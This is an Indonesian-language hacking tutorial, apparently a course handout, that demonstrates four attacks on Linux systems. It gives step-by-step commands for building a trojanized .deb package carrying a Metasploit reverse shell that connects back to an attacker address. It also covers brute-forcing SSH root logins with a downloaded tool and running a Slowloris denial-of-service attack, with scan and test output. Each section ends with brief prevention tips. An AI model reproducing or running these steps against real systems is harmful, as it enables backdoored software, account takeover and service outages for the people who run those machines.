Membuat Virus Linux - Kelemahan pada dpkg Install paket bukan ...

Membuat Virus Linux
- Kelemahan pada dpkg
Install paket bukan dari repositori, sehingga attacker bisa membuat dan
modifikasi file .deb
Sebagai contoh, modifikasi paket freesweep (Aplikasi Game pada Ubuntu)
seeker@bt # apt-get –download-only install freesweep
Perintah diatas hanya men-download pake freesweep tanpa diinstall kedalam
sistem
seeker@bt # mkdir /tmp/evil
Perintah diatas membuat direktori untuk membuat file .deb yang akan
dimodifikasi
seeker@bt # mv /var/cache/apt/archives/freesweep_0.90-2_i386.deb
/tmp/evil
seeker@bt # cd /tmp/evil/
seeker@bt :/tmp/evil# dpkg -x freesweep_0.90-2_i386.deb work
Perintah diatas akan mengekstrak paket freesweep
seeker@bt :/tmp/evil # mkdir work/DEBIAN
Membuat folder DEBIAN untuk menambah beberapa feature

seeker@bt :/tmp/evil/work/DEBIAN # vi control
membuat file 'control' untuk membuat informasi paket
seeker@bt :/tmp/evil/work/DEBIAN# vi postinst
Mmbuat file script postinst-installation yang akan di eksekusi.

seeker@bt # msfpayload linux/x86/shell/reserve_tcp LHOST=192.168.57.78
LPORT=443 X > /tmp/evil/work/usr/games/freesweep
Membuat malicious payload untuk digunakan sebagai reserve shell, sehingga
attacker dapat back connect menggunakan freesweep
seeker@bt :/tmp/evil/work/DEBIAN#chmod 755 postinst
Agar scriptnya dapat dieksekusi
seeker@bt :/tmp/evil/work/DEBIAN# dpkg-deb –build /tmp/evil/work
Mem-build paket menjadi work.deb
seeker@bt :/tmp/evil# mv work.deb freesweep.deb
seeker@bt # msfcli exploit/multi/handler
PAYLOAD=linux/x86/shell/reserver_tcp LHOST=192.168.57.78
LPORT=443 E
Attacker akan mencoba untuk menerima incoming connection
victim@ubuntu: sudo dpkg -i freesweep.deb

Cara mencegahnya:
– Pastikan mendownload dari repositori secara langsung
– Install paket menggunakan apt-get / yum
– Mengecek keaslian paket dengan md5sum
Attacking Account SSH dengan teknik bruteforce
Persiapan:
Install bebapa paket pendukung
user@ubuntu:~ sudo apt-get install python-crypto python-paramiko
Download Tool SSH Bruteforce
user@ubuntu:~ wget http://debianuser.org/bruteforce/brutessh.zip
Scanning Port SSH
user@ubuntu:~$ sudo nmap -sV 127.0.0.1
Starting Nmap 5.21 ( http://nmap.org ) at 2012-09-11 01:43 WIT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000027s latency).
Not shown: 992 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: KIOSSUNDIP)
443/tcp open http Apache httpd 2.2.22 ((Ubuntu))
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: KIOSSUNDIP)
631/tcp open ipp CUPS 1.5
3128/tcp open http-proxy Squid webproxy 3.1.19
3306/tcp open mysql MySQL 5.5.24-0ubuntu0.12.04.1
Service Info: OS: Linux
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.04 seconds
SSH Bruteforce:
user@ubuntu:~ python brutessh.py -h 127.0.0.1 -u root -d passlist.txt
Proteksi
– Good Password
– Change default port 22
– Membatasi maksimal failed login (fail2ban, firewall)
– Firewall:
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m
recent --set --name SSH
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m
recent --update --seconds 60 --hitcount 8 --rttl --name SSH -j
LOG --log-prefix "SSH_brute_force "
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m
recent --update --seconds 60 --hitcount 8 --rttl --name SSH -j
DROP

DNS Poisoning
DNS Poisoning termasuk jenis serangan Man In The Middle
DNS Cache Poisoning merupakan sebuah cara untuk menembus pertahanan
dengan cara menyampaikan informasi IP Address yang salah mengenai
sebuah host, dengan tujuan untuk mengalihkan lalu lintas paket data dari
tujuan yang sebenarnya. Cara ini banyak dipakai untuk menyerang situs-situs
e-commerce dan banking yang saat ini bisa dilakukan dengan cara online
dengan pengamanan Token. Teknik ini dapat membuat sebuah server palsu
tampil identik dengan dengan server online banking yang asli. Oleh karena
itu diperlukan digital cerficate untuk mengamankannya, agar server palsu
tidak dapat menangkap data otentifikasi dari nasabah yang mengaksesnya.
Jadi dapat disimpulkan cara kerja DNS (Domain Name System) poisoning ini
adalah dengan mengacaukan DNS Server asli agar pengguna Internet
terkelabui untuk mengakses web site palsu yang dibuat benar-benar
menyerupai aslinya tersebut, agar data dapat masuk ke server palsu.
Target dari DNS Poisoning
– User yang memakai akses LAN/WLan (Layer 2), atau user yang
terinfeksi virus/worm
– Owned Domain Manager
– Owned Root
HTTPD DoS / DdoS dengan Slowloris
Slowloris adalah sebuah tool DoS/DDoS yanng dibuat dengan menggunakan
perl. Slowloris ditemukan oleh RSnake. Tool ini hanya memakai sedikit
bandwidth dari attacker.
Beberapa tipe WebServer yang rentan terhadap serangan ini:
• Apache 1.x
• Apache 2.x
• dhttpd
• GoAhead WebServer
• WebSense "block pages" (unconfirmed)

• Trapeze Wireless Web Portal (unconfirmed)
• Verizon's MI424-WR FIOS Cable modem (unconfirmed)
• Verizon's Motorola Set-Top Box (port 8082 and requires auth -
unconfirmed)
• BeeWare WAF (unconfirmed)
• Deny All WAF (unconfirmed)
Sedangkan beberapa tipe WebServer yang tidak akan kena dari serangan ini:
• IIS6.0
• IIS7.0
• lighttpd
• Squid
• nginx
• Cherokee
• Netscaler
• Cisco CSS
Tool Slowloris membutuh program Perl interpreter dengan modul seperti
IO:Socket::INET, IO::Socket::SSL dan GetOpt::Long. Untuk menginstall
modul tersebut bisa menggunakan CPAN:
perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'
Persiapan:
Download tool Slowloris
user@ubuntu:~$ wget http://ha.ckers.org/slowloris/slowloris.pl
Scanning untuk mendapatkan jenis web server dan port-nya
user@ubuntu:~$ sudo nmap -sV 127.0.0.1
Starting Nmap 5.21 ( http://nmap.org ) at 2012-09-11 01:43 WIT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000027s latency).
Not shown: 992 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: KIOSSUNDIP)
443/tcp open http Apache httpd 2.2.22 ((Ubuntu))
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: KIOSSUNDIP)
631/tcp open ipp CUPS 1.5
3128/tcp open http-proxy Squid webproxy 3.1.19
3306/tcp open mysql MySQL 5.5.24-0ubuntu0.12.04.1
Service Info: OS: Linux
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.04 seconds
Victim menggunakan jenis webserver Apache httpd dengan versi 2.2.22 dan
port-nya 80.
Scanning server apakah mempunyai vulnerability terhadap serangan ini:
user@ubuntu:~$ perl slowloris.pl -dns [domain.com / IP target] -port 80 -test
user@ubuntu:~$ sudo perl slowloris.pl -dns 127.0.0.1 -port 80 -test
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP
client
Defaulting to a 5 second tcp connection timeout.
Multithreading enabled.
This test could take up to 14.3666666666667 minutes.
Connection successful, now comes the waiting game...
Trying a 2 second delay:
Worked.
Trying a 30 second delay:
Worked.
Trying a 90 second delay:
Worked.
Trying a 240 second delay:

Failed.
Trying a 500 second delay:
Worked.
Remote server closed socket.
Use 240 seconds for -timeout.
Setelah mengetahui limit timeout dari situs victim, attacker akan langsung
menyerangnya, yaitu dengan mengirim paket flood secara random
user@ubuntu:~$ perl slowloris.pl -dns [target] -port 80 -timeout 500 -num
500 -tcpto 5 -httpready
keterangan :
• -dns : the target ( dapat berupa IP atau domain )
• -port : port yg di gunakan oleh webserver ( 80 )
• -timeout: nilai waktu delay timeout untuk setiap paket thread, penantian
reacquiring ruang tcp di server. pada langkah pengetesan, Nilai ini diisi
dengan flag -test
• -num : jumlah soket yang digunakan untuk mendapatkan
koneksi.Biasanya server apache akan membutuhkan nilai antara 400-
600 atau tergantung pada konfigurasi
• -tcpto : TCP Timeout.
• -httpready: HTTPReady di gunakan apache untuk buffer connections.
attacker dapat melewati perlindungan ini dengan mengirimkan
permintaan POST bukan GET atau HEAD.
user@ubuntu:~$ sudo perl slowloris.pl -dns 127.0.0.1 -port 80 -timeout 240
-num 500 -tcpto 5 -httpready
Cara mencegahnya:
– Menggunakan LoadBalancing WebServer
– Mengganti webserver yang rentan terhadap serangan Slowloris dengan
webserver yang aman dari Slowloris
– Setting Firewall/Iptables, agar membatasi koneksi limit pada port 80
user@ubuntu:~$ sudo iptables -I INPUT -p tcp --dport 80 -m connlimit

--connlimit-above 20 --connlimit-mask 32 -j DROP